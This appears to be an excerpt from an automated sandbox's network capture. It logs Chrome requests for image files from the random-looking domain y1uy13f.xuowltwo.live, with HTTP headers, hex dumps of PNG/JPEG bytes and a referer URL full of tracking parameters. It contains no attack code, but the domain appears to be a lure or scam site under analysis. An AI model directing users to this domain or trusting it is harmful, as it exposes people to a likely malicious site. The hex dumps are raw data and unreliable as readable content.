                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "2f6bfed27c86fb5b0cf0796e73089fb0"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB6F76BCF11
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676809630#973322822/gid:0/gname:root/mode:33188/mtime:1663242360#392676000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-09-15T11:46:00.392676Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b8 00 00 02 02 08 03 00 00 00 8a ad 28 0f 00 00 03 00 50 4c 54 45 00 00 00 77 74 72 02 02 02 2c 2b 29 9f 9d 9b 02 01 01 a7 a5 a3 03 03 02 7e 7e 7c 03 03 03 04 04 03 10 0f 0e 62 5f 5e 6b 68 67 89 88 86 4b 4a 48 5b 59 58 38 37 35 77 75 74 54 52 50 14 14 12 07 05 04 00 00 01 2d 2b 29 31 2f 2e 2a 28 27 35 33 31 41 3f 3e 3e 3c 3a 38 36 35 45 43 42 3b 39 37 51 4f 4d 01 02 07 4a 48 46 4d 4b 4a e9 de db 27 25 24 06 06 05 e3 ea ea 02 03 0c e5 db d9 e8 ed eb df e8 e7 56 54 52 54 51 4f 24 22 21 02 05 10 59 56 54 73 6f 6c e2 d7 d7 d9 e5 e6 ea e0 dd 18 17 16 66 62 60 5c 59 57 1c 1b 19 da d0 d2 63 5f 5c 5f 5c 59 0a 09 14 6e 6a 68 20 1f 1d 00 0b 16 6a 66 63 09 08 09 d6 cb ce dd d3 d4 01 0f 1c 02 04 15 0e 0e 1a d4
                              Data Ascii: PNGIHDR(PLTEwtr,+)~~|b_^khgKJH[YX875wutTRP-+)1/.*('531A?>><:865ECB;97QOMJHFMKJ'%$VTRTQO$"!YVTsolfb`\YWc_\_\Ynjh jfc
                              2024-02-22 07:09:40 UTC4096INData Raw: f9 c5 c0 fd fa f1 8f df 3e 3e 54 10 1c 1e 90 ac 1b 4b a7 eb 95 74 8a cb 06 87 63 85 d5 38 1e 65 98 cb b3 7c 75 e5 9b 65 64 d4 ea ae e3 a2 e1 5c 08 94 a3 02 1d 07 f4 e8 7d 75 d1 68 0d 48 22 48 91 23 7f 2a 61 c8 ba 04 29 b0 a6 4a 7b 23 71 06 70 1c 2c 96 51 14 ac fd 67 62 b9 e5 82 e7 b4 b4 e3 34 e9 0e a2 e5 16 b3 5d f5 2d 67 be 30 e3 d2 64 b9 aa b2 ac f0 9a e3 d2 e0 58 94 64 e0 e2 7a a0 f2 72 db 05 f7 fd 4f 1f 7f ff f5 a7 ef e9 7e e1 09 8f c4 b8 b1 b3 a1 e5 f2 3b ae da ec c4 e5 89 e8 ae 2f f2 d5 94 fe b8 e8 d6 5c 6a 38 bd 5c 27 15 a5 2a 92 b2 df 9c 4c 5a 26 c4 48 20 b5 2f 28 5c a1 60 01 cf e9 1a 60 62 0d 15 d3 ab 2f 00 d6 82 9f f9 8f 8f 7e 10 2d 96 61 b4 28 4b a9 f2 44 96 6b 8c 1c 63 97 b6 5c d7 51 a3 24 52 56 aa c8 2b d7 38 2e 4d 0e 89 31 72 54 cd 28 06 97
                              Data Ascii: >>TKtc8e|ued\}uhH"H#*a)J{#qp,Qgb4]-g0dXdzrO~;/\j8\'*LZ&H /(\``b/~-a(KDkc\Q$RV+8.M1rT(
                              2024-02-22 07:09:40 UTC4096INData Raw: 42 b0 c1 8d 06 4a 05 87 aa 62 17 17 06 51 6b 7d 32 43 de a6 53 d1 c3 a9 2c b8 01 0f 72 18 43 a3 20 19 c0 0a 6a 28 c7 eb 0c 25 1c 95 1a 29 0d b8 c2 ad db 1e ba 31 b7 65 6c c7 fa a1 08 a2 b2 c8 76 ae 5a 31 1c 3d 21 37 7a 4c cb 4c 9e 3a cf d4 e5 50 c6 12 e5 7f 86 23 39 b1 42 01 9d 40 a2 9f 0f 85 b2 23 cc 5b 22 6e 72 43 2d 13 5a 51 70 98 e4 a2 20 a0 1f 88 82 7c c1 0c 57 08 3d 14 0d 98 94 b9 20 a8 f4 c6 a3 2a c1 35 3b c3 31 e0 18 5a 31 1c 3f 2a 59 d8 72 1b 27 92 3c 6d e6 f8 c8 83 86 ab 74 f1 e4 99 83 66 56 05 3b 72 73 a6 c3 b7 f3 7f c0 d1 a2 d2 4a 17 28 81 88 19 21 20 6e 54 a1 6f 47 92 13 6e 04 67 e5 70 15 ac 2a 2b 21 e6 c4 09 cd 6f a1 50 3b 20 be 88 ec 22 92 0b fd d9 00 6b 8f 9a c3 e1 54 95 48 9c 42 d3 b6 6e 5c 0d 45 66 2f 6b 61 bb 63 70 7c 4f b6 53 76 15 c4
                              Data Ascii: BJbQk}2CS,rC j(%)1elvZ1=!7zLL:P#9B@#["nrC-ZQp |W= *5;1Z1?*Yr'<mtfV;rsJ(! nToGngp*+!oP; "kTHBn\Ef/kacp|OSv
                              2024-02-22 07:09:40 UTC4096INData Raw: 06 f6 e9 36 6d db b9 a6 d9 76 01 07 4a 08 bf 73 33 e9 9c 87 29 39 9a 00 dd 06 ff 39 06 42 6e f8 92 34 65 5a 3a 65 d7 55 31 9d cb c9 5d 01 38 9f 6e 5c 0e 0f eb c2 91 d5 cc ec c2 3d b8 9d ff ce f9 e7 9f 9f a5 f6 99 83 c5 28 4d d2 32 1c e4 28 40 53 21 2a e9 22 bb 15 e1 e8 25 2b 76 80 7b d5 99 26 3b 18 8a ad ec d6 13 38 aa da 45 de 85 bc 4f 5d 35 a7 3b d6 cc 3a 4d ae 9d 6b 9e 5b 33 a3 e9 08 ca 39 b4 51 37 d0 c5 23 b7 6d 59 ee 04 cf b4 ae 57 a4 33 13 e6 25 77 a9 7b fa a0 53 65 ca 4f 2b a3 3b 35 05 b8 d9 c5 c5 f9 85 3b af bb ee ce 77 bf f8 f4 dd 5c e5 92 08 95 0b 2b 45 38 6d 94 58 3e 6d 19 01 51 dc 76 86 3b 7e c4 1c 9c bc ce 6e 14 7c b7 9d 4b c5 49 b2 bb f5 bb 55 13 37 db b6 ed 6d 42 2b ab 81 4d 6b ac ad 35 d7 10 f7 5d 53 bd 3f c7 e7 9a ca d0 34 d3 b6 cf d4 ee
                              Data Ascii: 6mvJs3)99Bn4eZ:eU1]8n\=(M2(@S!*"%+v{&;8EO]5;:Mk[39Q7#mYW3%w{SeO+;5;w\+E8mX>mQv;~n|KIU7mB+Mk5]S?4
                              2024-02-22 07:09:40 UTC4096INData Raw: 31 ad 1d 3b 27 70 70 db 0d 2b e7 e9 ac dc cb 8b c3 51 4e da 80 a4 d3 90 ab 9e 41 47 37 c2 cd 2f dd 7c 38 1c 4c de db 28 47 51 56 dc d0 b7 46 08 67 1f dd e6 c1 3d 31 9d 57 b8 23 d0 d1 6d 28 5b 47 e1 b6 74 4f a7 db 0d 34 60 73 53 37 a9 57 0b d1 32 b2 42 83 62 04 0c e8 2a b2 c4 c3 99 34 c1 a7 a5 c3 95 f5 36 e9 c6 e0 f6 88 1c e9 98 9b b8 d5 76 b2 64 e5 d8 b8 17 2f 06 57 c9 47 78 59 63 48 57 ce 53 8e a5 83 9d e0 35 cf 71 3b bf 75 d8 0b 96 8a 77 df dd 28 96 d4 ad 00 b7 15 75 6b cd 4f 83 70 e6 09 f8 83 84 43 4e ac db cd 9b 01 9b 86 6c 36 82 d6 a3 1a 1a 91 30 23 96 cd 53 3c 95 e5 a9 a7 74 ad ea 47 2e d5 98 1d ff 69 30 71 86 bd 63 7a 71 3a c4 da 59 39 c0 9d 60 b0 72 0b c2 15 31 94 0d 70 4e 4e e9 32 f6 e5 23 9e ad 4e 37 81 c3 70 f9 0f c4 74 2e 2a 37 ee bf b7 55 cc
                              Data Ascii: 1;'pp+QNAG7/|8L(GQVFg=1W#m([GtO4`sS7W2Bb*46vd/WGxYcHWS5q;uw(ukOpCNl60#S<tG.i0qczq:Y9`r1pNN2#N7pt.*7U
                              2024-02-22 07:09:40 UTC4096INData Raw: 0b 85 f3 67 cc 62 6a 4c bb 54 e7 ef a6 75 bd 14 1d 12 56 4b b8 05 39 c0 4d eb 95 f3 83 e5 e9 1b 9b c1 ed 26 7f 6f aa fd 4c a9 57 9b b9 68 aa 6c 49 92 d6 89 cf e5 38 12 b7 7e ff e0 b0 01 37 e4 27 a8 b6 38 ba 95 84 2b 9d 0d f1 be 21 62 bb 50 38 c6 e4 6c 70 b9 ac e4 ac 71 91 9c e7 e9 7f 06 17 a7 ad 73 4e a7 c6 f1 cd 32 bd ca 8c 53 95 a3 58 f5 36 76 03 5c d2 b8 de 3c 61 33 37 8f f6 37 8b ad 91 e8 db 50 70 5b 30 23 5c 36 e9 7a 89 8c 10 7c 54 16 55 6e ea 6e ba 22 d0 16 b7 69 e3 84 66 63 75 a2 df 99 a3 1c e9 da 1b a7 ca c5 76 b5 2c 85 eb 96 f5 95 72 5a bf 82 2b 2c a3 d0 b7 a1 45 75 bb 58 38 85 70 96 ba 1c d8 b8 cf 49 6e dc bd 80 c6 a9 72 cc 5e dc 38 75 2e 0f a7 3d ce b0 a8 16 b3 19 a3 e0 94 c1 71 80 53 e1 a6 75 38 d2 45 70 52 bb 40 38 c9 d9 b2 4d 38 84 70 d6 b9
                              Data Ascii: gbjLTuVK9M&oLWhlI8~7'8+!bP8lpqsN2SX6v\<a377Pp[0#\6z|TUnn"ifcuv,rZ+,EuX8pInr^8u.=qSu8EpR@8M8p
                              2024-02-22 07:09:40 UTC4096INData Raw: 8b 2e 9e 1c 14 0e e9 14 4a d7 d7 52 d1 8e 99 30 bd 12 45 28 f4 42 42 de 7e 47 3f 2e c8 93 e8 36 54 b8 f4 9a 5a 35 ca 97 a0 69 60 96 e7 36 53 e7 23 6b 27 3e 9f 6b ca 2c 7c f9 33 e1 cf 93 b1 ac cf f1 39 7a 66 6c e0 b0 79 ea bf 6e a6 a0 de ff 34 4e 16 d8 c2 b1 41 46 29 16 08 5c 6e ae 65 25 12 89 4b 89 b2 61 55 af 24 07 20 10 d7 2b 96 01 dc 09 b0 ab aa 61 c8 98 c1 51 3a db 0b f7 07 5c c8 49 ee 52 85 23 ac 02 f1 42 bc c8 d0 e1 e2 e2 15 ae 4c 92 c8 b4 53 93 7c 6e 62 62 b0 95 df c4 86 34 1b e2 8c 44 82 5c 75 66 a3 b9 b1 83 73 46 65 af 57 20 de 82 51 cd c1 45 99 f0 d0 46 b4 97 e2 d1 21 c3 5d 6c e5 c9 c5 be 51 aa 5c 3c f5 c2 0f 92 9c d3 4d a2 6f e8 a9 f9 51 c2 29 10 6f 3a b6 7f de 73 e5 49 53 25 8f 7c 78 18 19 1e 5c 5c 5a d7 e1 22 e4 6a d9 0a a9 4b 6e 2e 1e 85 b3
                              Data Ascii: .JR0E(BB~G?.6TZ5i`6S#k'>k,|39zflyn4NAF)\ne%KaU$ +aQ:\IR#BLS|nbb4D\ufsFeW QEF!]lQ\<MoQ)o:sIS%|x\\Z"jKn.
                              2024-02-22 07:09:40 UTC4096INData Raw: e9 f7 50 8d 70 17 18 91 0e 87 7b 39 db 14 6f 40 dd 36 0d ca 8f 72 73 b8 55 57 e1 9e d7 70 67 80 53 e5 e2 0d 4a 38 2d 27 d5 f6 72 82 47 e8 0f d2 5a c7 68 66 92 4f d9 13 8c 0e 0f b9 14 aa 55 6d bb a0 1b 6e 68 6c 80 93 9b ea 16 f5 4d 6e 9b dd 79 97 e0 3e d4 70 05 e1 28 b7 94 5c 4d 97 7f 44 d2 f9 3c ad e4 ac 72 78 84 3e b9 92 91 3a e7 6c 54 1b 36 d8 d8 26 6d f3 eb fe f1 07 e9 7a 6a b4 8a 8d 65 c3 31 19 4d ac f0 63 ca cd d3 79 ea 6e 79 c3 0d 09 e0 fa 37 83 7b 7a 1f 72 77 31 0f 5a e0 34 2b 83 ce e5 46 97 9a 1c a7 25 3b 87 07 38 15 9d f4 d4 3b 45 86 3a 25 d5 68 5a c0 56 d5 6d c4 31 e9 b7 ad 37 25 29 eb 96 7b e1 32 6d 28 c3 c2 21 db 97 f5 d7 2a 3b 05 57 6e 2c 92 2b 29 57 d1 49 6e 9e a6 e9 38 55 e9 b0 7c 5c 26 b6 2e 9a 7a 22 3c 9c d7 ba b6 b0 b9 da 94 6d 73 b7 09
                              Data Ascii: Pp{9o@6rsUWpgSJ8-'rGZhfOUmnhlMny>p(\MD<rx>:lT6&mzje1Mcyny7{zrw1Z4+F%;8;E:%hZVm17%){2m(!*;Wn,+)WIn8U|\&.z"<ms
                              2024-02-22 07:09:40 UTC4096INData Raw: a7 24 3c e9 61 3e 39 fc 45 92 09 4d 66 98 cc 1e d8 f6 f6 ce f7 c4 86 43 ab dd 90 70 9b f0 34 1c 0d 19 2d 0e 4e d7 f1 09 72 0b cf 4b 0d 70 a4 ab 48 37 95 1c d9 6c 58 e9 8e 30 f6 6c d8 f5 33 b9 62 cd cc ed 62 3e fc e9 09 6c fc dd 02 4d 55 63 d9 f0 b6 e1 e6 47 32 44 c2 6d 2a 37 aa a1 6e 8b 87 93 c7 d2 dc 94 12 6e 42 b6 90 9b 60 80 ae 0e e5 88 07 3b 5c 2f 8c 73 b3 63 0e 10 e1 85 9f 13 96 f9 09 3a d8 fc a9 3d 2b e2 66 8d 6a cc 79 ad 76 ee 6a 64 3b c4 a8 dd 26 19 db 82 e1 34 96 2d 57 c2 7d 5f 8d ce 2c 5a 30 fd e4 a7 c4 3b 9c 8e 0f c7 e3 63 ca f9 72 e9 76 a4 fb 03 93 74 a5 9e 1a 78 fa e8 ca 9c 92 0b 23 0b 5e 2c 85 4d c3 ce d0 10 57 4b 6e 87 75 db 26 8e 46 b5 94 11 b2 f8 a5 72 15 1a 77 17 70 41 57 d9 38 a9 2a 97 b3 90 ee 10 31 bb 21 f1 60 87 b0 78 91 59 3d e1 89
                              Data Ascii: $<a>9EMfCp4-NrKpH7lX0l3bb>lMUcG2Dm*7nnB`;\/sc:=+fjyvjd;&4-W}_,Z0;crvtx#^,MWKnu&FrwpAW8*1!`xY=
                              2024-02-22 07:09:40 UTC1108INData Raw: b5 c1 7d 4d cb cb 09 56 77 14 35 a5 77 a1 af cc 76 00 5d 29 d6 1e 12 87 dc 41 d7 b2 36 a8 82 36 f4 46 34 d3 b3 c6 3d 02 4f a0 03 b8 e2 68 e8 b8 ac 88 1a e3 4a e9 4f 8a 85 67 52 dc 1f 1f c9 ba 23 d6 4e 0a 84 71 81 ec ef 97 2e ce 71 fb d1 89 74 c9 9c e2 24 6a 85 0a 3c 11 d1 2f 0c 7b 04 2e 7f cc d7 53 81 3a d3 1d 48 7f da d6 f2 b0 0b bc a4 a0 66 c7 41 fb e1 98 06 d2 5e f8 87 85 67 b3 bb 18 d7 9d 06 99 5b 17 8b fb bf 26 71 8e 18 4d 7c 07 e6 bc ad 4f c9 c9 65 c8 e2 00 86 2a a8 33 15 e9 35 1a 7e 4f a0 bf 42 7d 55 1b 12 97 61 4e 12 86 57 d3 1f 6b 9a 91 74 b7 e8 6b 81 35 28 cd 17 42 f0 07 28 eb 86 4e 1b cb 31 71 18 2b 85 a8 cc 2d 41 e6 34 ce 2c 50 ae 42 3c d4 01 73 42 87 cb 1f 0a 97 5c a2 37 22 b7 32 70 dc 19 89 4b 7f 18 88 1f 6a 82 71 f3 f1 70 06 42 de 0d e9 06
                              Data Ascii: }MVw5wv])A66F4=OhJOgR#Nq.qt$j</{.S:HfA^g[&qM|Oe*35~OB}UaNWktk5(B(N1q+-A4,PB<sB\7"2pKjqpB


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.449766185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC374OUTGET /media/mainstream/all/ab/l.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 9224
                              Connection: close
                              ETag: "a0560779cf67aeb9a0c19f68f3582024"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6F549A2F3
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#284024580/gid:0/gname:root/mode:33188/mtime:1675688264#107993000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2023-02-06T12:57:44.107993Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 01 25 08 03 00 00 00 64 a1 75 10 00 00 01 56 50 4c 54 45 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 fc af 17 ff ff ff ff ff ff fc af 17 fc af 17 ff ff ff fc af 17 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc af 17 ff ff ff fc af 17 fc af 17 ff
                              Data Ascii: PNGIHDR%duVPLTE
                              2024-02-22 07:09:40 UTC4096INData Raw: ca 50 01 84 6f 8b 01 ac c1 55 5d 60 85 f1 63 80 00 08 5b 0b a0 7d 85 b4 ef 9c 46 ef 14 ea 3f 8f 6f 89 7c 7d ff 01 34 3a e0 ea f1 a0 02 98 83 ab ea 28 f8 8c 49 7c 8f 02 e8 23 ed c2 00 77 f7 82 cb 94 5e 74 e4 ca a4 7c 07 70 1b fc 9f 7b de 01 6f e4 08 a0 0a ae d4 33 e4 ca 82 bb 9b cf 0f a0 bf a1 00 ea 5d 4f ef 4c e0 38 41 2e ad 07 7c 85 33 ea 82 d6 6f 00 ec 12 02 3f 7a 3e 49 81 37 72 04 60 06 5f 60 39 06 77 49 25 f4 00 b6 74 1b d4 28 22 2d 2b b2 8a 2e 52 05 1e 7a 98 cc ae 13 01 f8 5b 58 d8 d3 0e 28 80 d8 03 b8 8a 66 90 2b 71 08 01 18 6b 6f 2b 42 38 ee 62 c8 75 aa 0a ce d2 62 d2 6f 00 67 25 70 97 b0 77 2d 00 23 ea a8 67 9b 09 60 6a 04 0f a0 10 38 00 eb 05 42 36 74 0a b9 8d 04 30 b7 84 f7 bb ee 11 7f 44 ba 26 d8 36 c6 fd 06 30 05 8e 6a 64 77 02 68 df 2d 9b ab
                              Data Ascii: PoU]`c[}F?o|}4:(I|#w^t|p{o3]OL8A.|3o?z>I7r`_`9wI%t("-+.Rz[X(f+qko+B8bubog%pw-#g`j8B6t0D&60jdwh-
                              2024-02-22 07:09:40 UTC1815INData Raw: df 14 80 90 b9 de ac fa ec 18 a4 65 55 d5 ec c4 a9 16 69 db 17 46 d0 b4 23 03 2b 2c 37 9c ce 79 cd 0e 77 2a b7 04 46 29 99 77 cd ba 6f d3 45 18 3a 4e 72 ab 5c ea 45 3f 79 29 27 b0 06 b5 45 bd f6 68 c0 2f 52 94 c0 0d 71 59 46 71 c8 1e 56 65 12 41 98 cd 9c 77 8f 86 3c c4 02 b3 4a 15 8d c9 92 81 2d 92 40 5e 0c 75 05 1a a1 19 65 82 46 0c 62 17 9b 7c 45 9b 68 84 fe 4c 6c 68 24 c7 ba cd 2a b1 e6 34 26 74 80 9b dd 79 24 0d 8d 34 0c ac 12 6e 3c ba e0 75 2d 0e 45 67 b1 a2 91 2d 03 bb d4 bd 4f 97 44 87 5b e9 39 1c 10 03 d8 2f 90 34 c5 3d e0 ef c6 d3 32 1a e2 11 03 eb 44 9a d3 04 2e d7 25 e6 e1 79 5f 00 17 df f0 6c 54 6d 04 4d 52 45 80 12 98 73 06 68 b0 04 b2 52 f2 ae e8 8a 3c c3 e6 fa 11 d5 92 4d 28 68 80 63 06 b6 54 92 e6 9c a6 09 b9 45 32 70 5b 9d ae 72 29 cd 36
                              Data Ascii: eUiF#+,7yw*F)woE:Nr\E?y)'Eh/RqYFqVeAw<J-@^ueFb|EhLlh$*4&ty$4n<u-Eg-OD[9/4=2D.%y_lTmMREshR<M(hcTE2p[r)6


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.449768185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC752OUTGET /media/mainstream/all/ab/box_closed.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC781INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 5836
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "890d869db1b3d28af588be81685214f2"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB706AE1255
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#847577324/gid:0/gname:root/mode:33279/mtime:1653412322#873050000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:02.87305Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3315INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 01 b3 50 4c 54 45 00 00 00 f1 f2 f2 ee ef ef ac 1a 18 fe fe fe f3 f4 f4 d2 d4 d5 dd de df d2 d4 d5 de df e1 d2 d2 d4 d2 d4 d6 ed ee ee d5 d7 d9 d0 d2 d4 97 17 14 d2 d4 d6 8c 15 13 e1 e2 e3 bb 1c 1a a0 18 16 d0 d2 d4 d1 d3 d5 ed ee ef a8 19 16 c2 1d 1b cf d1 d3 b3 1b 19 e3 e4 e5 c2 1d 1a ef f0 f0 bf 1d 1a 96 17 15 c4 1e 1b 98 17 15 bf 1d 1a a7 19 17 c8 c4 c5 d8 2b 28 f0 f1 f1 b9 1c 19 cf d1 d3 b4 1b 18 ef f0 f0 a3 18 16 9b 17 15 8b 15 13 a0 18 16 8b 15 13 ca 1f 1c f5 f6 f6 f0 f1 f1 f7 f8 f8 f0 f0 f1 ed ef ef eb ec ec e6 e7 e7 d3 d4 d6 cf d1 d3 dd de df bd 1c 1a e0 e2 e2 a0 18 16 ad 1a 18 f6 f7 f7 d7 d9 da a9 1a 17 b3 1b 19 c2 1e 1b d5 d7 d8 de 21 1f c0
                              Data Ascii: PNGIHDR?PLTE+(!
                              2024-02-22 07:09:40 UTC2521INData Raw: e7 6d 17 46 db 4f 4c 2b 58 d9 0a 98 a6 0f 14 dc 43 05 66 f5 cd 2d 9b f8 5b b3 20 15 bc 2b 68 8c cc 3e 7d 36 20 15 54 40 41 12 b3 0a 47 48 81 be d2 b5 cb 17 bb bb fe 35 bb a2 42 11 22 1b 55 0a 26 9f 14 07 52 0a 6e a3 82 fe 86 df d2 b6 db c2 37 59 90 5e 7a 17 51 8f 96 f0 9c 34 f4 74 80 31 a5 a0 da 1b c7 a1 c8 82 af fa 42 56 b1 10 9d ea fa c7 90 02 e2 1d 13 4c ce 14 8b eb 29 05 4d 52 70 cb 24 80 8e be 9d 6b 6e cb d2 9b e7 6a c0 85 f1 10 14 04 4a 41 a9 1e 03 e2 bf e2 8d 51 f4 ae 13 21 d9 28 b8 75 ab d1 68 44 03 8c 98 7a 65 d9 fe 7a c8 14 b1 50 50 23 01 46 81 5c fb 5c da c0 35 37 1d 3c 61 46 09 54 30 f4 91 6b 05 5e 0c f4 0a 05 be 53 8b 80 0c 15 14 e8 a7 62 53 c2 c0 eb e8 96 e3 a6 14 dc 24 05 23 85 b6 19 00 8f 34 d7 90 f6 a5 4f 8f 12 ce e3 fe d9 a1 65 a3 80 c7
                              Data Ascii: mFOL+XCf-[ +h>}6 T@AGH5B"U&Rn7Y^zQ4t1BVL)MRp$knjJAQ!(uhDzezPP#F\\57<aFT0k^SbS$#4Oe


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.449769185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC745OUTGET /media/mainstream/all/ab/fr4.jpg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC784INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/jpeg
                              Content-Length: 4307
                              Connection: close
                              ETag: "f96150cbbb80ac607b3f264141a7faef"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB704F1C1F2
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#272024543/gid:0/gname:root/mode:33279/mtime:1653412324#641054000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.641054Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
